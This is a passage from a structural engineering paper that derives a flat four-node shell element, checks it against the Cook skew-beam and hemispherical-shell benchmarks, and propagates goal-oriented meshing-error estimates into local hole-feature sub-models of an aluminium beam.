rotational stiffness about the z-axis, often termed the drilling DoF, is neglected due to the thin nature of the elements. To allow for three dimensional system and subsequent non-planar global coordinates, the element is implemented with a sixth DoF, but is constrained as a boundary condition. For the purpose of this paper, as the mid-surface is assumed as flat (i.e. there is no curvature to the elements and all nodes are co-planar), the shell element can essentially be classified by the superposition of plane stress, plate bending and shear stress, where the effects are assessed independently . The internal energy for this formulation is defined for each element by a linear geometric interpolation scheme throughout the element, expressed as:\n\n\\begin{aligned} U^{e} = \\frac{1}{2} \\int _{\\Omega _{e}}\\sigma _{b} \\cdot \\epsilon _{b} d\\Omega _{e} + \\frac{1}{2} \\int _{\\Omega _{e}}\\sigma _{m} \\cdot \\epsilon _{m}\\Omega _{e} + \\frac{\\kappa }{2} \\int _{\\Omega _{e}}\\sigma _{s} \\cdot \\epsilon _{s}\\Omega _{e}, \\end{aligned}\n(10)\n\nwhere $$\\sigma _\\alpha$$ and $$\\epsilon _\\alpha$$ are defined for the corresponding bending, membrane and shear components $$\\{\\alpha \\}$$ for each element domain $$\\Omega _{e}$$, and $$\\sigma _\\alpha \\cdot \\epsilon _\\alpha$$ is the tensor dot product of the stress and strain. The linear-elastic stress-strain relations are defined for a homogeneous isotropic material as:\n\n\\begin{aligned} \\sigma _{\\alpha } = C_{\\alpha } \\cdot \\epsilon _{\\alpha }, \\end{aligned}\n(11)\n\nwhere $$\\epsilon _{\\alpha }$$ is the applied strain and the material matrix $$C_{\\alpha }$$ is defined by the constitutive equation for plane stress/plate bending as:\n\n\\begin{aligned} C_{m}= & {} \\frac{E t}{(1-v^{2})} \\left[ \\begin{array}{ccc} 1 &{} \\nu &{} 0 \\\\ \\nu &{} 1 &{} 0 \\\\ 0 &{} 0 &{} \\frac{1-\\nu }{2} \\end{array} \\right] \\end{aligned}\n(12a)\n\\begin{aligned} C_{b}= & {} \\left( \\frac{t^{2}}{12} \\right) C_{m} \\end{aligned}\n(12b)\n\\begin{aligned} C_{s}= & {} \\left[ \\begin{array}{cc} G &{} 0 \\\\ 0 &{} G \\end{array} \\right] , \\end{aligned}\n(12c)\n\nwhere E and $$\\nu$$ are the material Young’s modulus and Poisson’s ration, t is the shell thickness, which is constant over the shell, and G is the shear modulus given as:\n\n\\begin{aligned} G = \\kappa \\frac{E t}{2(1+\\nu )}, \\end{aligned}\n(13)\n\nwhere $$\\kappa$$ is an additional classical shear correction factor. The coefficient is applied to take into account the thickness variation at the surface rather than the theoretically defined constant distribution for the transverse shear stress across the thickness. In accordance with , k is usually taken equal to 5/6 for a homogeneous, isotropic, rectangular section with no curvature.\n\nThe generalised strain-displacements for bending, membrane and shear are independently interpolated in the local coordinates by:\n\n\\begin{aligned} u (x,y) = \\left\\{ \\begin{array}{c} u_x \\\\ u_y \\\\ u_z \\\\ \\theta _{x} \\\\ \\theta _{y} \\end{array} \\right\\} = \\sum _{n=1}^{4} N_{n}(\\xi ,\\eta ) u_{n}, \\end{aligned}\n(14)\n\nwhere $$N_{n}(\\xi ,\\eta )$$ are the shape functions of a standard bi-linear four node element and $$u_n$$ is the nodal deflection for node n. With strains computed from displacements from the localised strain matrices for the element via:\n\n\\begin{aligned} \\epsilon _{\\alpha }(\\xi ,\\eta ) = B_{\\alpha }(\\xi ,\\eta ) \\{u_n\\}, \\end{aligned}\n(15)\n\nwith the strain-displacement matrices $$B_{\\alpha }$$ are defined by the derivation of the shape functions by defining individual matrices, $$\\{u_n\\}$$ is the collection of the nodal DoF based on the ordering of $$B_\\alpha$$. For bending $$B^{(e)}_{b}$$, membrane $$B^{(e)}_{m}$$, and shear $$B^{(s)}_{m}$$, the matrices are given as:\n\n\\begin{aligned} B^{(e)}_{b}= & {} \\left[ \\begin{array}{ccccccccccccc} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial x} &{} 0 &{} \\dots &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial x} &{} 0 \\\\ 0 &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} \\dots &{} 0 &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} \\\\ 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial x} &{} \\frac{\\partial N_{1}}{\\partial y} &{} \\dots &{} 0 &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial x} &{} \\frac{\\partial N_{4}}{\\partial y} \\end{array} \\right] \\end{aligned}\n(16a)\n\\begin{aligned} B^{(e)}_{m}= & {} \\left[ \\begin{array}{ccccccccccccc} \\frac{\\partial N_{1}}{\\partial x} &{} 0 &{} 0 &{} 0 &{} 0 &{} \\dots &{} \\frac{\\partial N_{4}}{\\partial x} &{} 0 &{} 0 &{} 0 &{} 0 \\\\ 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} 0 &{} 0 &{} 0 &{} \\dots &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} &{} 0 &{} 0 &{} 0 \\\\ \\frac{\\partial N_{1}}{\\partial x} &{} \\frac{\\partial N_{1}}{\\partial y} &{} 0 &{} 0 &{} 0 &{} \\ldots &{} \\frac{\\partial N_{4}}{\\partial x} &{} \\frac{\\partial N_{4}}{\\partial y} &{} 0 &{} 0 &{} 0 \\end{array} \\right] \\end{aligned}\n(16b)\n\\begin{aligned} B^{(e)}_{s}= & {} \\left[ \\begin{array}{ccccccccccccc} 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial x} &{} -N_{1} &{} 0 &{} \\dots &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial x} &{} -N_{4} &{} 0 \\\\ 0 &{} 0 &{} \\frac{\\partial N_{1}}{\\partial y} &{} 0 &{} -N_{1} &{} \\dots &{} 0 &{} 0 &{} \\frac{\\partial N_{4}}{\\partial y} &{} 0 &{} -N_{4} \\end{array} \\right] . \\end{aligned}\n(16c)\n\nTo account for elements within three-dimensional coordinate space, a transformation of nodal displacements and forces from local to global Cartesian coordinate system is performed separately. For each strain-displacement matrix, this rotation is performed by:\n\n\\begin{aligned} B_{\\alpha }^{\\prime } = L^{(e)}_\\alpha B_{\\alpha }, \\end{aligned}\n(17)\n\nwhere $$L^{e}_\\alpha$$ is the transformation matrix, which for flat elements, is constant for all element nodes and is defined using the following expression:\n\n\\begin{aligned} L^{(e)} =\\left[ \\begin{array}{cc} \\underset{3x3}{\\lambda ^{e}} &{} 0 \\\\ 0 &{} \\underset{2x3}{{\\hat{\\lambda }}^{e}} \\end{array} \\right] , \\end{aligned}\n(18)\n\nwhere:\n\n\\begin{aligned} \\lambda ^{(e)} = \\left[ \\begin{array}{ccc} \\lambda _{xx'} &{} \\lambda _{xx'} &{} \\lambda _{x'z} \\\\ \\lambda _{y'x} &{} \\lambda _{y'y} &{} \\lambda _{y'z} \\\\ \\lambda _{z'x} &{} \\lambda _{z'y} &{} \\lambda _{z'z} \\end{array} \\right] , {\\hat{\\lambda }}^{e} = \\left[ \\begin{array}{ccc} -\\lambda _{y'x} &{} -\\lambda _{y'y} &{} -\\lambda _{y'z} \\\\ \\lambda _{x'x} &{} \\lambda _{x'y} &{} \\lambda _{x'z} \\end{array} \\right] \\end{aligned}\n(19)\n\n$$\\lambda _{x'x}$$ is the dot product of the axes $$x'$$ and x etc. . In Eq. 18, the matrix is a despite the $$B_\\alpha$$ matrix only having 2 or 3 rows. To alleviate this issue, only the columns of interest are considered. For example, the shear component only looks at the in-plane rotational DoF, so the transformation matrix only contains the fourth and fifth column making $$L_s^{(e)}$$ a 5 $$\\times$$ 2 matrix.\n\nThe element stiffness matrix is therefore obtained by numerical integration for each element by:\n\n\\begin{aligned} K^{e} = \\int _{\\Omega _{e}} B^{\\prime T}_{b} : C_{b} : B^{\\prime }_{b} d \\Omega _{e} + \\int _{\\Omega _{e}} B^{\\prime T}_{m} C_{m} : B^{\\prime }_{m} d \\Omega _{e} + \\int _{\\Omega _{e}} B^{\\prime T}_{s} : C_{s} : B^{\\prime }_{s} d \\Omega _{e}. \\end{aligned}\n(20)\n\nThe vector of nodal forces, which are equivalent to distributed forces P are then calculated as:\n\n\\begin{aligned} f^{e} = \\int _{\\Omega _{e}} t N \\cdot P d\\Omega _{e} + \\int _{\\Gamma _{e}} t N \\cdot {\\hat{t}} d \\Gamma _{e}, \\end{aligned}\n(21)\n\nwhere $${\\hat{t}}$$ is the surface traction and $$\\Gamma _{e}$$ are the Dirichlet BCs. This selective integration for both the stiffness matrix and force vector, using a classical shell theory, is considered a simple procedure for avoiding shear locking of the element.\n\n#### Element formulation Verification\n\nTo evaluate the performance of the custom element implementation, two benchmark studies have been investigated, the Cook’s trapezoidal skew beam and the hemispherical shell with an $$18^o$$ hole. The purpose of the verification is to assess the accuracy of the shell element (Q4) by comparing it to a referenced benchmark solution and the widely used S4 element within ABAQUS.\n\nThe Cook-trapezoidal beam, proposed in , is used to assess the in-plane membrane performance when loaded in shear, under moderate distortion. The standard skew beam test, represented in Fig. 2a, is defined as a tapered beam, clamped on the left edge and subjected to a uni-axial traction load. The structure has a thickness of $$h = 1.0$$, and plane stress, material properties: Young’s modulus $$E = {3}{\\times } 10^{7}$$ Pa and Poisson’s ratio $$\\nu = 1/3$$. Where the loading, given as $$P = 1.0$$, is specified as a uniformly distributed shear load across the right end edge of the beam.\n\nFigure 3a,b shows the results of the normalized convergence accuracy for both the Q4 and S4 element, for increasing $$N{\\times }N$$ element mesh densities ($$N =$$2, 4, 8, 16, 32 and 64), with uniform, structured mesh patterns. Reference solution values for both the vertical displacement at point C is $$U_{REF(C)} = 23.96$$ (Fig. 3a) and the maximum and minimum principle stress at points A and B are $$\\sigma _{REF(A)} = 0.237$$ and B $$\\sigma _{REF(B)} = -0.202$$ (Fig. 3b), are taken from and respectively, using a refined numerical model. With the stresses at point A and B calculated as:\n\n\\begin{aligned} \\sigma _{1,2} = \\left( \\frac{\\sigma _{x}+\\sigma _{y}}{2} \\right) \\pm \\tau _{max},\\quad \\tau _{max} = \\sqrt{ \\left( \\frac{\\sigma _{x}-\\sigma _{y}}{2} \\right) +(\\tau _{xy})^2 }, \\end{aligned}\n(22)\n\nwhere $$\\sigma$$ and $$\\tau$$ are the principle stresses. The displacement and stress results show that although the Q4 element is not as accurate for coarse meshes, both elements are sensitive to distortion in membrane deformation problems. With Q4 requiring a finer mesh to be able to converge to the reference solution. Verification results by , using the same mesh densities, show that the measured vertical tip displacement for the Q4 element is equivalent to the MITC4 element results they present. The verification of both displacement and stress shows that the Q4 element is valid for natural values (displacement) and its derivative (stress/strain), which are both used in the GOEE approach in this work.\n\nThe hemispherical shell with $$18^o$$ hole problem, proposed by , and represented in Fig. 2b, is investigated to evaluate the elements performance under in-extensional bending deformations and rigid body rotations, normal to the shell surface. The, double-curved, hemisphere, with a radius $$R = 10.0$$, is defined as a thin shell, thickness $$h = 0.04$$, with an $$18^{o}$$ open hole at top and in plane stress material properties: Young’s modulus $$E = {6.825}{\\times } 10^{7}$$ Pa and Poisson’s ratio $$\\nu = 0.3$$. Where the loading is defined as two pairs of opposite radial concentrated loads $$P = 1.0$$. Utilizing axial symmetry, one quarter of the structure, corresponding to the region ABCD, is modelled with symmetrical boundary conditions along edges AC and BC. As with the previous benchmark, the same element mesh densities ($$N{\\times }N$$) are evaluated, with uniform, structured mesh patterns. A radial displacement coincident value at point A, $$U_{REF(A)} = 0.094$$, is used as the reference solution. . The normalized convergence displacement $$(U_{A}{/}U_{REF(A)})$$ is illustrated in Fig. 3c, comparing Q4 and S4 against the referenced solution. One interesting aspect to note is the increased accuracy, even with a course mesh, compared to the Cook’s skew beam. These two validation cases demonstrates that the Q4 element used in this work is comparable to other shell elements commonly used.\n\nCurrently the proposed formulation is suitable for the analysis of thin shells of arbitrary shapes and has been verified against well known membrane and bending benchmark problems. With the latter agreeing well with the referenced solution for lower mesh densities. For membrane dominated problems, although its overall accuracy, under in plane shear deformation, is reduced, it can converge to an accurate solution when finer meshes are used. Minimising mesh distortion. To increase overall accuracy, a shell element formulation, with a second order geometric interpolation scheme, would need to be adopted. Where the formulation for bending and membrane contributions interact and the cannot be treated independently using the current super position approach . This is a subject of ongoing research. However, it should be noted that the example problems implemented in the current work avoids this complexity by implementing only thin, flat elements, with a uniform mesh.\n\n### Specifics for using the GOEE\n\nThe GOEE approach described in “Global GOEE approach” Section uses a single dual problem with a single material constitutive matrix. In this work, these two details are modified to match the desired analysis. The first detail discussed is the single material constitutive matrix. This approach works perfectly when the element is constructed with a single material constitutive matrix. However, this work (as described in “Custom element formulation” Section) separates the construction of the stiffness matrix into three components of bending, membrane, and shear, thus creating three material constitutive matrices.\n\nDue to the calculation of the stiffness matrix being comprised of bending, membrane, and shear components, the GOEE is also comprised of three components. The GOEE is calculated for each component then summed as:\n\n\\begin{aligned} GOEE = GOEE_b + GOEE_m + GOEE_s, \\end{aligned}\n(23)\n\nwhere $$GOEE_\\alpha$$ is the GOEE calculated with the bending, membrane, and shear material constitutive matrix. One aspect that can be noticed in “Custom element formulation” Section is that the material constitutive matrices do not span all six DoF of the system. To account for this, Eq. 9 does not use all six DoF for each component, only the DoF used for each component is utilized for the GOEE calculation. For example, the shear component only uses the in-plane rotational DoF. This calculation is done on a local coordinate system then transformed back into the global coordinate system.\n\nThe second main modification is the use of multiple dual problems. In the initial approach, there is only one dual problem being performed. However, in this work, multiple dual problems are used since it takes the error at multiple points (boundary DoFs for the sub-model). To account for this, multiple GOEE are also computed. For each dual problem, there is a corresponding GOEE value. These values are stored and used in a method that is described in “Application to multi-scale GOEE propagation” Section.\n\n## Application to multi-scale GOEE propagation\n\nThe GOEE approach described in this paper is used to describe the meshing error in the global model in a single QoI, such as the displacement in a specific direction at a specified location (then iterated for each location and direction). To incorporate the multi-scale aspect of this work, a pre-computed sub-modelling approach (also called feature modelling) is used to take the information from the global model and estimate the quantities (specifically the element centroid stresses) within the feature model. This methodology is based on the generation of pre-computed unit normalized solutions for the sub-model. The pre-computed solution is used in a linear superposition calculation to approximate the loading on the sub-model.\n\nThe multi-scale methodology used in this work uses a two stage multi-scale approach. This involves using two models of the local feature to generate a matrix of results for linear superposition calculation. For clarity, the three models used in this multi-scale analysis are:\n\n1. 1.\n\nThe global model of the entire system. This is typically constructed using only shell elements. These elements are assumed to be quadrilateral, but current work is being performed to expand this methodology to triangular and a mixture of triangular and quadrilateral elements. In the current implementation, this model is solved within python.\n\n2. 2.\n\nThe shell surrogate model of the local feature. This also utilizes shell elements but includes physical features such as holes and a more refined mesh. For this work, these are S4R ABAQUS shell elements.\n\n3. 3.\n\nThe feature model of the local feature. This uses the same region as the shell surrogate model but is expanded into full 3D elements. The mesh for the continuum elements does not necessarily correspond to the mesh of the shell surrogate due to the use of ABAQUS’s shell-to-solid sub-modelling function. This model uses C3D8R ABAQUS continuum elements.\n\nIn addition to these models, two sets of nodes are defined within these models. Driving nodes are the nodes of the global model that define the boundary of the feature. The other set is the driven nodes comprising of the node set for the shell surrogate model on the boundary. These two sets of nodes overlap in physical space, thus there is a 1-to-1 mapping of driving and driven nodal location. In practice, this is not a requirement if an interpolation function is used. Using an interpolation function can cause discontinuities and discrepancies with the energy transfer between global and feature models, so this work enforces the boundary of the shell surrogate model to have the same nodal location as the global model while the interior contains a more refined mesh. This will be shown for the demonstration system in “Demonstration system” Section.\n\nIn order to calculate the pre-computed solution, unit deflection is applied to each driven DoF then propagated using the shell-to-solid procedure in ABAQUS. Simply, within the shell surrogate model, a single driven DoF are individually displaced by unity and the other driven DoF are kept to zero displacement; this is looped for each driven DoF. This can be quite expensive, but it is assumed that the shell surrogate models are relatively small compared to the global model. One reason this method was chosen is due to the industrial use cases that have repeated features (such as fillet/bonds) that would use the same pre-computed results but applied at different locations. This will have different macro-level results applied to the same pre-computed solution. After this calculation, the feature model directional stresses are calculated using the shell surrogate model as a base-model and the feature model as the sub-model within ABAQUS utilizing the shell-to-solid sub-modelling option. After the shell-to-solid analysis within ABAQUS, a report of the directional stresses at the centroid of each element is written and converted into a large [M] matrix of pre-computed solutions that is used for these simulations. This matrix is a collection of each element’s pre-computed solution stored in the sub-matrix $$[M]_f$$ for each element f in the feature model. The calculation of the $$[M]_f$$ matrix is performed independently of the global model with the linear superposition used to couple the global and feature models.\n\nIn order to calculate the feature model stress from the pre-computed solution, the $$[M]_f$$ matrix is used for each element via:\n\n\\begin{aligned} \\left\\{ \\begin{array}{c} \\sigma _{11} \\\\ \\sigma _{22} \\\\ \\sigma _{33} \\\\ \\sigma _{12} \\\\ \\sigma _{13} \\\\ \\sigma _{23} \\end{array}\\right\\} _f = \\left[ \\begin{array}{cccc} M_{11} &{} M_{12} &{} \\cdots &{} M_{1N_{DR}} \\\\ M_{21} &{} M_{22} &{} \\cdots &{} M_{2N_{DR}} \\\\ M_{31} &{} M_{32} &{} \\cdots &{} M_{3N_{DR}} \\\\ M_{41} &{} M_{42} &{} \\cdots &{} M_{4N_{DR}} \\\\ M_{51} &{} M_{52} &{} \\cdots &{} M_{5N_{DR}} \\\\ M_{61} &{} M_{62} &{} \\cdots &{} M_{6N_{DR}} \\\\ \\end{array}\\right] _f\\left\\{ \\begin{array}{c} U_1 \\\\ U_2 \\\\ \\vdots \\\\ U_{N_{dof}} \\end{array}\\right\\} =[M]_f \\{U\\}, \\end{aligned}\n(24)\n\nwhere $$\\sigma _{xy}$$ is the directional stress of the element centroid, $$M_{xj}$$ is the directional stress field of the feature model due to a unit displacement of driven DoF j in the shell surrogate model with a total of $$N_{DR}$$, and $$U_j$$ is the displacement of the driving DoF in the global model that corresponds to the driven DoF j. One aspect to note, is that for this work, each driven/driving node has 6 DoF with 3 displacement and 3 rotational DoF. Each DoF for each driven node is utilized in the matrix [M] with the knowledge that one of the rotational DoF is zero due to the element formulation. Currently, the driving DoF are taken and applied directly to the feature model. Future work will incorporate an interpolation methodology to lessen the assumption that the global and shell surrogate models have the same boundary mesh.\n\nEquation 24 is useful for the calculation of the directional stresses. However, this work is focused on the error propagation. Through a simple variation analysis, the error on the feature model stress can be determined via the error on the displacement calculated via the GOEE. This analysis generates the equation\n\n\\begin{aligned} \\left\\{ \\begin{array}{c} \\delta \\sigma _{11} \\\\ \\delta \\sigma _{22} \\\\ \\delta \\sigma _{33} \\\\ \\delta \\sigma _{12} \\\\ \\delta \\sigma _{13} \\\\ \\delta \\sigma _{23} \\end{array}\\right\\} _f = \\left[ M\\right] _f\\left\\{ \\begin{array}{c} GOEE_1 \\\\ GOEE_2 \\\\ \\vdots \\\\ GOEE_{N_{dof}} \\end{array}\\right\\} , \\end{aligned}\n(25)\n\nwith $$\\delta \\sigma _{xy}$$ representing the expected error on the stress, $$[M]_f$$ is the element pre-computed solution, and $$GOEE_j$$ being the calculated GOEE for the driving DoF j. To calculate the error on a failure criterion, the error of the stress components are propagated into the feature model. Then the failure criterion is performed for both the nominal values and the error adjusted values, and the difference is the reported error on the failure criterion. The main work presented in this paper assumes that the GOEE is deterministic (representing an offset) since a dual problem is performed for each driving DoF. A second analysis is also performed to quantify some of the robustness of this multi-scale methodology. This assigns a distribution to the driving DoF and performs a Monte-Carlo simulation to give an estimate on the robustness of the various feature models. The robustness measures are the $$95\\%$$ confidence interval of the von Mises stress at the location of maximum stress and the standard deviation field. In this paper, each driving DoF distribution is treated as independent. With the variances seen in these results, this assumption does not lead to large differences between adjacent nodes. Additionally, the robustness measure presented in this work is focused mainly to show how variability propagates into the feature model. If this approach is used for decision making, additional work might be required to determine a correlated multi-dimensional distribution for the Monte-Carlo sampling to ensure a smooth displacement field and prevent the possibility of local failures such a crack initiation.\n\nIt should be noted here that, with the a posteriori error estimates of driving DoFs in hand, a user has many options of how to take samples such that distributions in resultant quantities of interest (von Mises stresses in this work) can be developed. It is relatively straightforward, although at a larger computational cost, to develop a covariance matrix between error estimate observation points. This would allow conditional distributions in DoFs to be estimated, rather than the simple marginal approximations used here. The development of multivariate distributions will be the focus of a future publication, however the emphasis of the present work is the implementation of GOEE methods in shell element problems with a view to propagating uncertainties. The ease of implementation and the simplicity of the marginal sampling method are the main motivations for its application in the present work, however readers are encouraged to note that more robust alternatives can be readily implemented.\n\nTo perform this second simulation, the nominal displacement at the driving nodes are displaced by a normal distribution with a mean of the GOEE value calculated via the dual problems. The calculation of this distribution utilizes the limits of the error described in where the limits of the error is based on a scaling factor of the true error. For this analysis, it is assumed that the true error is on the order of the average GOEE of the boundary nodes. In this simulation, the standard deviation of the driving nodes is based on a random number between zero and one and the mean GOEE for that direction among all the driving nodes. This random number is assigned per node from a standard uniform distribution. For node i in direction k, the displacement DoF is distributed as:\n\n\\begin{aligned} \\mathbf {U_j} \\sim U_{j0}+{\\mathcal {N}}(GOEE_{i},Uni_n*Mean_j) \\end{aligned}\n(26)\n\nwhere $$U_{j0}$$ and $$GOEE_{i}$$ are is the nominal displacement and GOEE respectively generated from the previous analysis, $$Uni_n$$ is the random number from a standard uniform distribution for node n, and $$Mean_j$$ is the average GOEE for all the driving nodes in the direction of DoF j. It is noted that $$GOEE_i$$ corresponds to driving DoF j. In the Monte Carlo simulation, this displacement distribution is sampled and applied through Equation 25 to calculate the error of the directional stresses, then converted into the error of the von Mises stress (by subtracting the adjusted von Mises stress to the nominal von Mises). One aspect to note is that since the nodal value is based on a random number, the exact values shown in this analysis are illustrative to show the trends of how the randomness of the driving nodes in the global model affect the variability of the feature model.\n\n### Demonstration system\n\nThis work is demonstrated on a beam section to explore this methodology with a variety of local feature models, which can be seen in Fig. 4. The global system is comprised of aircraft relevant Aluminium-2024 and has a constant thickness of 1 mm with the red dots identifying the driving nodes of the system and where the feature is located. Although the multi-scale methodology is designed for composite material, this system uses Aluminium. This should be considered as a preliminary step to ensure that this methodology is reasonable and provides satisfactory results. Composite materials are currently being studied to be presented in future work.\n\nFor this system, there are 61 driving nodes with a total of 366 DoF. This results in 366 dual simulations being performed. Additionally in Fig. 4, the BC of fixing the displacements of one end and the applied point-force of 400 N, located at the other end, is shown in orange. This selection of the applied force is based on the global von Mises stress. The result from the global system reaches a peak stress near the von Mises yield criterion of 265 MPa.\n\nOne of the main focuses of this work is to compare possible local features as a study of the sensitivity of this methodology to the feature model design. In total, there are four local features used, for which the shell surrogate models of each design are pictured in Fig. 5 with fully compatible boundary meshes to the global model. One aspect to note in Fig. 5 is that the features contain holes that are not modelled in the global model. This is due to the size of these holes being smaller than one element in the global model. However, since stress concentration are expected near holes, this multi-scale modelling approach is utilized in order to predict the stress near these holes with the propagated GOEE used to quantify the confidence of the stress given the course global mesh. The various feature models are based on the initial design (Fig. 5a) that contains one hole with a diameter of 10 mm and one with a diameter of 5 mm, both in the section called the flange. This work also makes modification of these holes as well as the addition of holes to the other section called the webbing.\n\nWithin the various feature designs, one design modifies the holes on the initial design, and two designs add holes to the webbing. Figure 5b expand the small hole into a 30 mm long slot with the same diameter (5 mm). In addition to modifying the already existing holes, two modifications are added to the webbing while maintaining the nominal holes in the flange. The first design contains a 10 mm hole in Fig. 5c, and the second replaces the single large hole with three individual 5 mm holes in Fig. 5d.\n\nAnother aspect to note is the mesh on the models in Fig. 5. This mesh enforces the boundary to be compliant with the global model, such that the driven and driving nodes correspond to the same physical locations. However, due to the utilization of the shell-to-solid use in the sub-modelling technique, there is no requirement for the meshes of the shell surrogate and feature model to be identical (with the only requirement being related to the number of elements in the through thickness). So, for plotting the results for the local feature models, simplified, yet more refined, feature models are used. This refined mesh creates a large [M] matrix but is still feasible on a fairly standard desktop. As a test, the several feature models meshes were created while keeping the shell surrogate mesh constant. Results from these tests (not presented in this work) showed no noticeable differences since the main calculation occurs in the shell surrogate model.\n\n## Results\n\nThe focus of this work is based on the multi-scale propagation of meshing error in the global model. To give a reference to the errors experienced in this system, the global model GOEE field is presented in Fig. 6. These results are the error in the displacement in the bending direction (in meters). One thing to note is that similar fields are also calculated for each of the six directions. Additionally, the propagation analysis only requires the GOEE at the driving nodes, but the GOEE is computed for the entire global model to show the overall trend of the error. Overall, the errors are small compared to the nominal deflection, so the global model mesh is well defined for this loading condition. This gives an estimate of 0.062 mm for a 8 mm deflection.\n\nSince the GOEE used in this work is based on the size of the global mesh, it is expected that a more refined mesh produces less error. While this has not been validated for the sub-modelling propagation, it has been validated on the global model. The results in demonstrate the GOEE methodology in a single-scale analysis with various meshes. It was seen that the error decreases as the mesh become more refined.\n\nFor comparing the propagated GOEE, there are three simulations for each local feature. The first simulation does not use the GOEE but is used as a baseline. This is the von Mises stress of the feature. As a baseline, this gives a good indicator on possible failure and a simple comparison between designs. The second simulation is the error on the von Mises stress for each feature. This is calculated via a perturbation of the propagated GOEE for the components of stress, then the computed von Mises stress is subtracted from the nominal stress profile calculated from the first simulation. The final simulation is the robustness testing by adding a stochastic displacement of the driving DoF, propagated via a Monte Carlo sampling. This Monte Carlo sampling shows two results with the first result being the standard deviation field on the webbing, and the second being the $$95\\%$$ confidence interval at the location of maximum von Mises stress found in the first simulation. The standard deviation field gives a qualitative understanding on how the error spatially affects the feature model, while the confidence interval gives a quantitative estimate on the probability of failure.\n\n### Initial design\n\nOne of the key aspects of the initial design is the two different size holes in the flange. Adding these holes that are not part of the global model introduce stress concentrations around the holes. To demonstrate whether there are any effects due to the stress concentrations, the results for the first two simulation for the initial design are shown in Fig. 7 for both the nominal von Mises stress (in MPa) in Fig. 7a and the error of von Mises stress (also in MPa) in Fig. 7b.\n\nThe first aspect to investigate is the nominal stress in the feature model, seen in Fig. 7a. This shows a maximum stress of 217.9 MPa at the top of the webbing. It is interesting to denote the shape of the stress field. There is a gradient along the webbing with almost zero stress in the flange, with a small increase near the holes. This low stress on the flange makes sense due to the loading condition and the use of shell elements. In a shell with a small thickness, such as the ABAQUS S4R, there is very little through thickness stiffness, so the major component of stress for these elements on the flange is due to stretching as opposed to bending. In the custom user element, it is assumed to be a thin shell so there is zero through thickness stiffness. For this loading condition, the global bending is much larger than the in-plane stretching so the stress on the webbing, which experiences this bending, is much larger than in the flange. As a verification, although not shown in this work, a refined global model that contains the initial design feature was analysed. Since this is a simple and reasonably small system, this is still feasible as a validation study; This would not be feasible for a realistic system. The results from this simulation show nearly identical von Mises stress found in the feature region as well as the same field trend. There are some slight differences (less than $$1\\%$$ of the maximum stress) due to the stiffness of a continuum element compared to a shell element, but the differences in the stress are very small. This validation gives confidence in the multi-scale methodology used in this work.\n\nWhile the nominal stress gives a baseline understanding of the system, the main purpose of this work is for the GOEE propagated into the feature. The error of the von Mises stress can be seen in Fig. 7b. This is calculated by applying the GOEE to the directional components of the stress, taking the von Mises stress of the adjusted stress then taking the difference from the nominal von Mises stress. A major result from this analysis is that the maximum error on the stress is 3.5 MPa and is located at the bottom of the webbing at one edge with other zones of larger error also along the edge of the webbing. The location of the errors on the edge is plausible since the error is based on the global model and propagated through the edges. When looking solely at the maximum stress, the error is less than $$2\\%$$, but the largest error is not located at the region of high stress.\n\nThe final simulation is the study of robustness in the multi-scale approach via the Monte Carlo sampling resulting in the standard deviation field and the $$95\\%$$ confidence interval of the von Mises stress at the location of maximum stress. This location is at the top of the webbing section. The confidence interval for this location is $$220.0\\, \\pm \\, 8.8$$ MPa. This produces a greater than $$95\\%$$ confidence that the maximum von Mises stress is below the yield criterion. In addition to this specific interval, the field for the standard deviation of the Monte Carlo samples for the webbing is shown in Fig. 8. One of the most interesting aspect of this standard deviation is that it is localized to the edges with a maximum standard deviation of 20.7 MPa. However, the locations of this large standard deviation do not occur near the area of maximum stress but near the location of maximum error.\n\n### Slotted hole design\n\nThe second design expands the small hole in the initial design into a 30 mm long slot. This extension of the circular hole into a slot is thought of as a design that can accommodate more sensors on the design for testing and prototyping, for example adding a thermocouple near a pitot tube. The nominal stress and propagated error can be seen in Fig. 9. Both fields are very similar to the initial design feature with even the same maximum values.\n\nIn addition to the same maximum values, the slotted feature also closely matches the general field. The main reason for this is the fact that the flange experiences low stress due to the loading and the use of thin elements. This same effect can be seen for the propagated GOEE as the error in the von Mises stress. Both the nominal stress and the error fields look identical to the fields for the initial design.\n\nDue to the low stresses on the flange, there is little difference between this design and the initial design. This is also experienced in the Monte Carlo simulation. With the Monte Carlo simulation, the results were nearly identical to the initial design results (within the error of the Monte Carlo simulation). This is primarily since no modifications were made to the areas where there is high stress. Because there are no identifiable differences, the slotted design results for the Monte Carlo simulation are not presented.\n\n### Single webbing hole design\n\nWhile the first two designs contain holes only in the flange section, the last two contain holes in both the flange and webbing section to get a better understanding regarding these design changes in areas of higher stress. This specific design puts a single 10 mm hole in the webbing section. The reason for the location of this hole is based on the knowledge gained from the previous two designs. They showed that the holes on the flange do not make a large difference in any of the metrics used in this work for this specific loading case. To better test the methodology, the next two designs utilize holes near the areas of maximum stress. The nominal stress and error of the von Mises stress results for this design are shown in Fig. 10.\n\nThe first thing to observe in Fig. 10 is the addition of the webbing profile to better identify any stress concentration due to the additional hole. This is primarily used to highlight the location of the concentrations and as a comparison between the single and triple hole features. For the von Mises stress in Fig. 10a, the maximum stress is 289.7 MPa. The maximum stress for this single hole slightly exceeds the yield criterion for this type of aluminium of 265 MPa. With this stress value, it is believed that local plastic deformation would occur, but not cause a full failure. It is important to note that this simulation only accounts for linear-elastic material properties. This is not a requirement for the multi-scale methodology, just for the current implementation. In the current analysis, only linear-elastic behaviour is modelled, thus these results when applied to a physical system is only valid before yielding. Further nonlinear behaviour (such as plasticity) can be estimated in this analysis by a series of linear moduli, however this would complicate the generation and utilization of the [M] matrix. This would require multiple [M] matrices and a custom interpolation algorithm between these multiple matrices. Doing this is theoretically possible but is beyond the scope of this work.\n\nIn addition to the increase in the maximum value, the stress field is also significantly different compared to the initial design. The difference is apparent in two main areas. First is the location of the maximum stress. In the initial design, the maximum occurred on the upper edge, while the single hole has it located on the hole via a stress concentration, occurring at the top of the hole. The second is an almost swirling effect since the side of the hole has low stress that 